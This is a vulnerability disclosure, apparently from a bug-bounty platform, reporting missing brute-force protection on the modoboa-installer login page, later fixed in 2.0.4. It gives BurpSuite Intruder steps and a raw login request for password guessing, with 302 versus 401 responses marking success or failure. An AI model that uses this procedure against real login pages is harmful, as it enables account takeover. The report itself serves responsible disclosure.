No Protection Against Bruteforce Attacks on Login Page in in modoboa/modoboa-installer


Reported on

Feb 13th 2023


Modoboa does not restrict or limit unsuccessful login attempts allowing an attacker to brute force the password of a known user

Proof of Concept

Steps to Reproduce:

Capture login request with BurpSuite Send to Intruder Replay the login request with a different password value utilizing a password list payload Should the password exist a "302 Found" reason code will be issued Unsuccessfull attempts are returned with a "401 Unauthorized" reason BurpSuite will continute attempting all passwords in the password list until complete Request to be replayed:

POST /accounts/login/ HTTP/1.1
Content-Length: 123
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: lhc_vid=6329efff387471209bb0; fsNick=admin; fsLogkey=NitRWJcUvIn12gjh8kVKazD07MsuqHmxeXAT45fCyLpGbPElZBrOw3dSFYQo96; fsLang=en_EN; fsCompany=1; csrftoken=RlWHrJOqodNZ9lTk6N6WUMhBTQ2LVNhZVDSEs3tOHSx4eI3bbXnNQ2Wfz6IkargL
Connection: close

Response on successful guess:

HTTP/1.1 302 Found
Date: Thu, 19 Jan 2023 21:27:50 GMT
Server: WSGIServer/0.2 CPython/3.9.16
Content-Type: text/html; charset=utf-8
Location: /dashboard/
Expires: Thu, 19 Jan 2023 21:27:50 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
Vary: Accept-Language, Cookie
Content-Language: en
Content-Length: 0
Set-Cookie:  csrftoken=JGu3cD6SKchdVSkBFRUiofpt0h8Z6P5OLf3DRmWzKHNkaVhLUDNKFlcTg2uACDs4; expires=Thu, 18 Jan 2024 21:27:50 GMT; Max-Age=31449600; Path=/; SameSite=Lax
Set-Cookie:  sessionid=0mah6hyvojbt7cbjh06sksu61sj4tnay; HttpOnly; Path=/; SameSite=Lax


The impact is unlimited password attempts leading to Brute Force attacks on the login page. Should this software be hosted on a website, it may also lead to Denial of Service.


This is the same report submitted but to the correct affected repository. Maintiner was notified January 19, 2023 of this vulnerability which has been fixed and merged in commit :

We are processing your report and will contact the modoboa/modoboa-installer team within 24 hours. 2 months ago
We have contacted a member of the modoboa/modoboa-installer team and are waiting to hear back 2 months ago
Antoine Nguyen validated this vulnerability 2 months ago
0xsu3ks has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Antoine Nguyen marked this as fixed in 2.0.4 with commit 63d92b 2 months ago
Antoine Nguyen has been awarded the fix bounty
This vulnerability has been assigned a CVE
Antoine Nguyen published this vulnerability 2 months ago
to join this conversation